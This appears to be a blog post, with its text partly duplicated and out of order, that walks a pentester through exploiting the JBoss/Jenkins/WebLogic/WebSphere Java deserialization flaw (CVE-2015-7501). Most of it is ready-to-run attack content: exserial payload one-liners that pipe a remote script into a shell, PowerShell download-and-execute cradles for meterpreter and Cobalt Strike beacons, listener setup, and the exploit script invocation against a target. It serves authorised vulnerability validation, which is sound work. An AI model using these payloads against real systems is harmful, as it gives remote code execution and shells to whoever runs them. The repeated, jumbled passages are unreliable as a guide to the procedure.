Maybe you are on a pentest or a vulnerability management team for your organization and you ran across a deserialization finding. This vulnerability affects a number of products including but not limited to JBoss, Jenkins, Weblogic, and Websphere. The example finding below is from Nessus vulnerability scanner:
JBoss Java Object Deserialization RCE
Now that you have the finding you need to validate it. We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.
For more information, a very good and detailed explanation can be found here: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell. If you are spawning reverse shells, remember to start your listener first. ;-)
1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl http://myserver.com/todo.sh|/bin/sh" > payload.ser
3) Cobalt Strike beacon
Create the listener (ex: reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name: rev_https
Payload windows/beacon_https/reverse_https
IP: <Your teamserver IP>
Port: 443
Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this
Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/a'))" > payload.ser
Syntax:
python jboss.py http://<target>:<port> /path/to/payload
Example:
python jboss.py http://JbossServer:8080 /root/deserial/payload.ser
JBoss Java Object Deserialization RCE
Description: The remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted RMI request, to execute arbitrary code on the target host. (CVE-2015-7501)
Family: Web Servers
Nessus Plugin ID: 87312
Now that you have the finding you need to validate it. We will outline just one possible method for validating JBoss, Jenkins, Weblogic, and Websphere below.
Background info
In a nutshell: "The Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library."For more information, a very good and detailed explanation can be found here: https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Step 1) Download Tools
Now on to the exploit/validation! Clone or download the zipped tools here: https://github.com/getcode2git/exserialStep 2) Building the payload
Quick and easy one-liners per the exserial instructions:The exserial readme provides two great examples shown below, but we will add a Cobalt Strike option for those who prefer a beacon shell. If you are spawning reverse shells, remember to start your listener first. ;-)
1) Run a shell script on a Linux victim:
$ java -jar exserial.jar CommandExec Linux "curl http://myserver.com/todo.sh|/bin/sh" > payload.ser
2) Get a reverse HTTPS meterpreter shell via powershell download of Invoke-Shellcode
Setup the listener:
msf> use exploit multi/handler
msf> set payload windows/meterpreter/reverse_https
msf> set lhost <local IP>
msf> set lport <local port>
msf> set ExitOnSession false
msf> exploit -j
Create the serialized payload:
$ java -jar exserial.jar CommandExec Win "powershell IEX (New-Object Net.WebClient).DownloadString('http://myserver.com/CodeExecution/Invoke--Shellcode.ps1');Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <ListenerIP> -Lport 4444 -Force" > payload.ser
Create the listener (ex: reverse_https to 443)
Cobalt Strike -> Listeners -> Add
Name: rev_https
Payload windows/beacon_https/reverse_https
IP: <Your teamserver IP>
Port: 443
Attacks -> Web Drive-by -> Scripted Web delivery
Default will work for this
Create the serialized payload:
java -jar exserial.jar CommandExec Win "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx/a'))" > payload.ser
Step 3) Running the Exploit
Now that the payload is created, it is time to run the exploit. In the scripts folder, you will find four python scripts. The example below shows the syntax and an example for using the JBoss exploit.Syntax:
python jboss.py http://<target>:<port> /path/to/payload
Example:
python jboss.py http://JbossServer:8080 /root/deserial/payload.ser
Conclusion
This is a fast and flexible method to validate this vulnerability. Other possibilities for validating this issue include, downloading a "flag", running a reverse ping, or a netcat shell.Huge thanks to https://github.com/RickGray for the publicly available tools.
No comments:
Post a Comment